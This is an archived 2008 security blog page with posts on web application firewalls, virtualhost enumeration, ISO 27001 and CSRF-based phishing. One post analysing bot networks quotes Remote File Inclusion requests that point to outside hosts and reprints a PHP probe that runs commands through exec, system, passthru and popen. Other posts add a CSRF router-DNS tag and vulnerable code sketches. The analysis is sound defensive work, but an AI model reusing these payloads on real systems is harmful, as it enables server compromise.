Archive for January, 2008

Yes, it is…

January 31, 2008

Recently I wrote about the issues I have with web application firewalls. However, today I’d like to give a short shout-out to the ModSecurity Blog and its newest article, “Is Your Website Secure?”.

I like the message of the article so much that I’ll just cite the relevant section:

[…] one of the following: web vulnerability scanning, penetration testing, deploying a web application firewall and log analysis does not adequately ensure “security.” While each of these tasks excel in some areas and aid in the overall security of a website, they are each also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly “defensible web application.”

I do think that some of the activities mentioned above are more effective (and therefore more important) than others, but generally, I couldn’t agree more. Very well put, Ryan Barnett, thanks!

Picture of scary spider in its web by Vanessa Pike-Russell

Finding Virtualhosts

January 29, 2008

Web applications are often the most vulnerable of all applications in an IT infrastructure, as they are

  • often built in-house by the company, and therefore have not undergone the security testing that standard software might have been subjected to, and
  • reachable from the Internet, so anyone with an Internet connection can access them.

Additionally, more than one domain can be served from a single web server. Each domain is then considered a virtualhost.
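With Apache, for example, this is done via name-based virtual hosting; a minimal sketch (the domain names and paths are placeholders):

# Apache 2.x name-based virtual hosting (sketch; names and paths made up)
NameVirtualHost *:80

<VirtualHost *:80>
    ServerName www.example.com
    DocumentRoot /var/www/example-com
</VirtualHost>

<VirtualHost *:80>
    ServerName www.example.org
    DocumentRoot /var/www/example-org
</VirtualHost>

The Host header of the incoming HTTP request determines which of the two sites is served.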

It’s sometimes really difficult to find all domains that are served from an IP address, as DNS offers no way to enumerate all domains that point to a certain IP. For an attacker or penetration tester, it is important to find as many virtualhosts as possible, as each one might contain vulnerabilities of its own.

The only way to do this is to build a large database with as many domain names as possible, complete with the IP address that these domain names point to. Luckily, there are a couple of tools that have done exactly that:

  • YouGetSignal.com seems to be the newest tool and works pretty well. I did a couple of tests, and it finds virtualhosts not only for .net, .com or .org, but also for country-specific domains like .co.uk. According to the author of the tool, it simply uses search engine results to find as many domains as possible and performs DNS queries for them.
  • Robtex, the “Swiss Army Knife” as they call themselves, can also help to find virtualhosts, but the results are somewhat limited and partly out of date.
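If you want to try a small-scale version of this approach yourself, a quick PHP sketch (the domain list and target IP are placeholders; a real run would use domains harvested from search engines) could check which candidate domains resolve to a given IP:

<?php
// Check which candidate domains resolve to the target IP.
// gethostbyname() returns the name unchanged on failure, so the
// comparison simply fails for domains that do not resolve.
$target = '192.0.2.1';
$candidates = array('www.example.com', 'www.example.org', 'shop.example.net');
foreach ($candidates as $domain) {
    if (gethostbyname($domain) === $target) {
        echo "$domain is served from $target\n";
    }
}
?>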

Picture of IT infrastructure where you literally have to find the web-server by kchbrown

Analyzing Bot Networks

January 27, 2008

If you operate a web server, do you have a look at your log files from time to time? If yes, chances are good that you see strange requests with URLs as GET parameters. I checked my log file and copied a couple of these requests:

GET /?name=PNphpBB2&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt?
GET /classes/dcomp.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt?
GET /wing-calendar/send_reminders.php?includedir=http://laformigueta.com/1?/

Most of these requests originate either from worms that are trying to propagate themselves or, like the ones above, from bots that are trying to find new members for their army. If you want to quickly find them in the log of your web server, simply grep for libwww, as most of them use “libwww-perl/x.xx” as User-Agent.
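For example, on a typical Apache setup (the log path is an assumption):

grep libwww /var/log/apache2/access.log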

What these requests try to exploit is a vulnerability called Remote File Inclusion. It works if two conditions are met:

  • Unvalidated user input must be used in an include* or require* PHP function.
  • The PHP configuration setting allow_url_fopen must be set to “on” (which it is by default); since PHP 5.2, including remote URLs additionally requires allow_url_include, which is off by default.
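To illustrate, here is a minimal sketch of the vulnerable pattern (the parameter name is hypothetical, modeled after the requests above):

<?php
// Vulnerable: unvalidated user input reaches include().
// Called as script.php?includedir=http://attacker.example/id.txt?
// PHP fetches and executes the remote file.
include($_GET['includedir'] . '/functions.php');
?>

The trailing “?” in the injected URLs above is no accident: it turns whatever the script appends (here “/functions.php”) into a harmless query string.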

If the attacker succeeds in getting the vulnerable PHP script to include the URL passed as an HTTP parameter, it is automatically loaded and executed by PHP. Let’s have a look at the source code that is injected. I just visited http://www.doblepenalti.com/web/components/id.txt (I won’t link it; the server is currently a member of a bot network, and I have no idea how long this will be the case. Chances are the operators will get a clue sometime and the link won’t work any longer) and copied the content of the file here:

010: <?php
020: echo "Mic22";
030: $cmd="id";
040: $eseguicmd=ex($cmd);
050: echo $eseguicmd;
060: function ex($cfe){
070: $res = '';
080: if (!empty($cfe)){
090: if(function_exists('exec')){
110: @exec($cfe,$res);
120: $res = join("\n",$res);
130: }
140: elseif(function_exists('shell_exec')){
150: $res = @shell_exec($cfe);
160: }
170: elseif(function_exists('system')){
180: @ob_start();
190: @system($cfe);
200: $res = @ob_get_contents();
210: @ob_end_clean();
220: }
230: elseif(function_exists('passthru')){
240: @ob_start();
250: @passthru($cfe);
260: $res = @ob_get_contents();
270: @ob_end_clean();
280: }
290: elseif(@is_resource($f = @popen($cfe,"r"))){
300: $res = "";
310: while(!@feof($f)) { $res .= @fread($f,1024); }
320: @pclose($f);
330: }}
340: return $res;
350: }
360: exit;

I added line numbers in order to make it easier to describe the code. Actually, it’s pretty simple. All it does is try to execute the command “id”. To achieve this, it tries different functions that allow the execution of commands: exec (line 110), shell_exec (line 150), system (line 190), passthru (line 250) and finally popen (line 290). It probably does that because some web server administrators block PHP functions that may be used to execute commands, but very often one or more are forgotten.
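If you administer a PHP server yourself, the lesson is to block the whole chain, not just one function; a php.ini sketch:

; php.ini: disable every function the payload probes for, not just exec
disable_functions = exec,shell_exec,system,passthru,popen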

The output of the id command is simply printed (line 050). The bot that sent out the probe checks whether the script returns anything after “Mic22” (line 020) and thus knows whether it succeeded. If so, it will install the bot software on the vulnerable web server.
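I don’t have the bot’s own code, but its check might look roughly like this hypothetical reconstruction (all URLs are placeholders):

<?php
// Hypothetical reconstruction of the bot's probe check (not actual bot code):
// fetch the injection URL and look for command output after the "Mic22" marker.
$url = 'http://victim.example/index.php?includedir=http://bot.example/id.txt?';
$response = @file_get_contents($url);
$pos = strpos($response, 'Mic22');
if ($pos !== false && strpos($response, 'uid=', $pos) !== false) {
    echo "vulnerable, id output found\n"; // next step: install the bot software
}
?>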

Actually, this is already an improvement over older bot versions, which used to include the complete bot code. That allowed anybody who checked their logs to analyze the code, which also contained the IRC servers and channels from which the bots are controlled. Unfortunately, my web server does not get many hits, so I can’t find the source of such a complete bot. I’ll see if I can find one somewhere and post it here.

Wiretapping Skype

January 25, 2008

A letter from the government of Bavaria in Germany was leaked (only available in German), describing in detail plans for wiretapping the Internet telephony (in particular Skype) of private citizens.

Apparently a company has been contracted to write a Trojan that can be installed either by police officers who enter the domicile to set up physical wiretaps, or via email. OK, this probably won’t work for you guys who read this blog, but most people click on anything that moves. And who has an encrypted hard disk at home?

What stands out is the cost of the Trojan. It is only EUR 3 500.- (approximately $ 5 100.-) per month and per person under surveillance. The reasoning is that this can only be worthwhile for the company supporting the software if it’s used often. I’m not so sure about this. It should be possible to create a quick and dirty Skype Trojan within a week. The letter mentions some advanced features like online update and removal, or file transfer to servers outside of Germany. These would take a little longer to implement, but not too long. If I were them, instead of attacking Skype I’d rather just grab microphone input and speaker output. This would allow wiretapping the whole room, and would also work with other VoIP programs.

It probably won’t take long until Germany is another black country on the surveillance map.

Picture of phone equipment by peterkaminski

Tide Out for Web Application Firewalls

January 23, 2008

I recently stumbled across an article by Ivan Ristic, who also writes for the ModSecurity Web Security Blog. It’s about how 2008 is finally going to become the year of Web Application Firewalls.

I really hate to be a spoilsport, but I’m afraid it’s still a long time until we have such a thing as the Year of WAFs. I’ve never been a huge fan of such firewalls, and for good reason. I’ll use this posting to tell you why I feel this way.

While I think that e.g. ModSecurity can increase security somewhat, the dangers IMHO outweigh the gains. Here is my reasoning:

  • Web Application Firewalls give companies a false sense of security. With a normal network firewall, people know exactly which ports are blocked and which traffic is let through. With a WAF in front of an application, it is impossible to know which vulnerabilities can or cannot be prevented. Many instances of SQL Injection or Cross-Site Scripting will be detected, but others will fall through the cracks. I’d rather know that I have lots of SQL Injections in my application than think it is secure when it in fact has a few exploitable flaws.
  • Many critical vulnerability classes cannot be detected or prevented at all. Flaws in the logic of an application, or Cross-Site Request Forgery vulnerabilities (which get more interesting by the minute), can be exploited even with a WAF in front of the application. In connection with the false sense of security mentioned above, this can be a problem, even though I admit that “they don’t protect against certain attacks” is a weak argument against using WAFs.
  • They increase the attack surface by adding a new layer. While ModSecurity seems to have a pretty clean vulnerability record, this does not hold true for other Web Application Firewalls. In any case, they do add a layer of complexity and therefore also bear the risk of introducing new vulnerabilities. In fact, I’ve seen WAFs that were more easily hacked than the applications they were supposed to protect.
  • False positives can cause the protected application to stop working. WAFs come with a huge number of default rules, but many are not context-sensitive, and those that are can often be tricked. Take the word “union”, for example: it might be used by an attacker exploiting an SQL Injection vulnerability, or by a valid user posting a comment about the European Union (see the sketch after this list). Another example is a forum that allows certain HTML tags in postings; the default configuration will break the complete forum functionality. Companies using WAFs to protect huge applications need to put a whole lot of work into testing whether their web applications still work under boundary conditions after installation.
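To make the “union” example concrete, a naive rule might look like this in ModSecurity syntax (an illustrative sketch, not a rule from any actual default rule set):

# Naive sketch: deny any request where a parameter contains the word "union".
# This catches UNION-based SQL injection, but also blocks a legitimate
# forum post about the European Union.
SecRule ARGS "@rx (?i)\bunion\b" "phase:2,deny,status:403,msg:'SQL injection attempt'"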

So, to sum it up, I think it is indeed possible to protect web applications from some attacks with WAFs. However, it takes a lot of work to correctly configure the product and make it fit the application. More importantly, correctly configuring it requires knowing the vulnerabilities to protect against. And once the vulnerabilities are known, it’s almost always more effective to patch the code instead of putting a WAF in front of it (there are some cases where this might not be true, e.g. when only the binary code is available and the manufacturer cannot be pressured into fixing the flaws).

So my appeal to web application developers: please, please start writing secure code. It’s not that hard! Have a look at the Open Web Application Security Project (OWASP) Guide. It is a great introduction to the world of secure development.

Picture of Lego-Firewall by ianlloyd

Phishing over CSRF

January 23, 2008

In my posting CSRF: And Go it Does, I wrote about a recently discovered Cross-Site Request Forgery vulnerability in Linksys WLAN routers. To quote myself:

However I agree that this is not the most critical vulnerability. How many people are permanently logged into their WLAN router?

I’m still convinced that not many people are permanently logged onto their router; however, the bad guys are once again one step ahead. They thought of a way to exploit the flaw that is, I have to admit, ingenious. Absolutely ingenious. Basically, using the flaw, any setting on the router can be changed, and that of course includes the DNS settings. So they used CSRF to change the DNS server of any router whose logged-in administrator happened to surf to a page containing the CSRF code.
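The carrier can be as simple as a hidden image tag; a sketch (the router IP and parameter names are made up for illustration, this is not the actual Linksys exploit):

<!-- If the victim's browser has an authenticated session with the router,
     this request is sent with his credentials and silently changes the
     DNS server setting. -->
<img src="http://192.168.1.1/apply.cgi?dns_server=203.0.113.53" width="1" height="1">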

The DNS server they used resolved the domain name of a Mexican bank to the IP of a phishing server. So next time you enter the URL to your online banking application, you should check the SSL certificate (you should always do that anyway). While we security guys are aware of such attacks, I’m sure 99% of online banking users are not.

So, as I predicted, once again an amazing use of Cross-Site Request Forgery. I’m sure there’s still a lot more to come!

Picture of Phishing Nets being thrown out at sunset by ezee123

ISO 27001 – The Good and the Bad (Part III)

January 21, 2008

I have no idea why, but my posts about ISMS are those that get by far the most hits. So I’ll continue the series ISO 27001 – The Good and the Bad (here are the links to Part I and Part II) with the topic I already mentioned yesterday: Measuring the effectiveness of controls.

The corresponding requirement can be found in clause 4.2.2d of ISO 27001:2005. In the words of the standard:

Define how to measure the effectiveness of the […] controls […] and specify how these measurements are to be used to assess control effectiveness to produce comparable and reproducible results […].

Ted Humphreys himself said that the requirement is not very clear. First off, it is important to note that this is one of three control mechanisms. The first is the internal auditing and management review required by the standard. The second is the incident management that must be implemented and used to identify potential vulnerabilities and close them via corrective and preventive actions.

We’re talking about the third one: measuring the effectiveness of controls. Let’s go through the clause word by word. The first thing that sticks out is that there is no limiting element in there. In theory you’d need to measure the effectiveness of each and every control you implemented in your ISMS. While measuring the performance of technical measures is not easy, it is at least doable by specifying key figures; measuring the performance of organizational controls is outright impossible. How are you supposed to find out how effective your security policy is? In a way that is reproducible? Forget it! What about screening? The only thing you can find out is when it was not effective. But by then it will be too late.

While I think the requirement itself does make sense, I would expect some guideline as to which controls the measurement must be implemented for. Measuring all controls is definitely impossible.

The second thing which in my humble opinion is unclear is how to measure the effectiveness. Using key figures is just a guess on my side. The auditor I accompanied a couple of months ago seemed to have the same opinion. It would definitely help if they included just a sentence with some guidance.

This guidance is going to be provided by a standard of its own, ISO 27004. The only problem is that it is still not available. Some people expect it to become available this year, but I personally think it won’t be released until 2009 (though I hope I’m wrong). What is available today, however, is BIP 0074:2006, called “Measuring the effectiveness of your ISMS implementations based on ISO/IEC 27001”. ISO 27004 can be expected to be based on the BIP book. Unfortunately, I have not yet had the chance to read it. If I can get hold of a copy, I’ll post an article about it here.

Alright, it’s become quite a long article. I’ll call it a day. If I forgot anything, please drop me a line in the comments section. Thanks!

Picture of an object of which I have no idea what it is, but which must have something to do with measuring by spacesuitcatalyst

RIAA Hacked

January 20, 2008

Funny thing: the RIAA apparently got hacked. The attackers used an SQL Injection vulnerability to manipulate the database. I never cease to be amazed at how easy it is to find such flaws in web applications.
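The underlying pattern is usually as simple as this sketch (hypothetical code, not the actual RIAA application):

<?php
// Hypothetical sketch of the vulnerable pattern (not the actual RIAA code).
$db = mysql_connect('localhost', 'user', 'password'); // placeholder credentials
// Vulnerable: the id parameter is concatenated into the query unescaped,
// so the attacker controls the rest of the SQL statement
// (classic example: ?id=0%20UNION%20SELECT%20...).
$result = mysql_query("SELECT title, body FROM news WHERE id=" . $_GET['id']);
?>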

I have no idea what used to be on the news room page, but an SQL Injection can’t do this. Either someone found something a lot worse (or better, depending on your point of view), or the RIAA did this to themselves.

While I’m writing this, it sounds like a great conspiracy theory: the RIAA hacks itself in order to prove that people who share music are indeed criminals ;).

While I’m at it, this is not the first time that companies enforcing intellectual property rights, or companies connected to them, got hacked. A group of guys seems to have stolen and leaked emails from MediaDefender, for example. Not quite a hack, but also interesting: IFPI obviously forgot to renew their domain registration, and the pirates gladly took it over.

[Update: The RIAA seems to have fixed the issue, so I updated the old links to a screenshot I took while the page was still offline]

Picture of Pirate Eye by Cayusa

Move to WordPress

January 20, 2008

Recently I’ve moved this blog from Blogger to WordPress. This is why the newer posts look a little bit different from the older ones. The reason for the move was that WordPress offers some features that Blogger currently does not have. As my blog did not have any visitors anyway, it didn’t matter much. It’s not like I would have broken links.

Anyways, there’s an interesting and funny feature I discovered in WordPress: the Tag Surfer. This is interesting for a couple of reasons. On the one hand, it tells you what people are currently blogging about. The first couple of tags are probably pretty static, like Life, News, Politics, Music, Sex etc. However, there are also some tags that reflect what people are interested in right now.

On the other hand, it’s great fun to find blogs that write about similar things as you do. Obviously, apart from me there are not many people on WordPress writing about CSRF, ISO 27001 or PortBunny. More general terms like Security yield more results. While there’s a lot of rubbish, you can discover some great blogs similar to yours. It’s definitely easier than just looking through the latest postings.

Picture of Web 2.0 logos by Stabilo Boss

ISO/IEC 27001:2009 and ISO/IEC 27002:2009

January 20, 2008

I’ve recently had the chance to hear a talk by Ted Humphreys, who – as editor of BS 7799-1:1999 and ISO 17799:2000 – was one of the fathers of ISO 27001:2005 and ISO 27002:2005. He is also the founder and director of http://www.iso27001certificates.com, the international ISMS certificates register.

While the talk itself did not contain much news, at the end Humphreys spoke about updates to the standards. According to him, a review cycle is going to start this April for both ISO 27001:2005 and ISO 27002:2005 (you know, formerly ISO 17799:2005). Revised standards can be expected for 2009.

In particular, for 17799 they are looking to add new controls. Input is being gathered from practically every national standardization body, so if you’ve got ideas for new controls, this is the place to bring them. What in my opinion is a little bit of a pity is that they are currently not thinking of dropping any of the existing controls. Things like limitation of connection time just don’t work against modern threats any more, in my humble opinion.

The management system standard itself, ISO 27001, is, according to Humphreys, not going to change a lot. At the moment there are no plans for new requirements. They have had some input regarding ambiguous or unclear clauses. Interestingly, one thing they want to clarify is the requirement to measure the effectiveness of selected controls. I still haven’t gotten around to writing the third part of my ISO 27001 – The Good and the Bad series (see Part I and Part II), but the topic was going to be this exact clause of the standard. It’s great that they want to clarify it in the next revision.

So, to sum it up, while in ISO 27001:2009 there will be only minor adjustments, we can expect lots of new controls in ISO 27002:2009. I can’t wait for it!

Picture of Bragging Wall by Beth77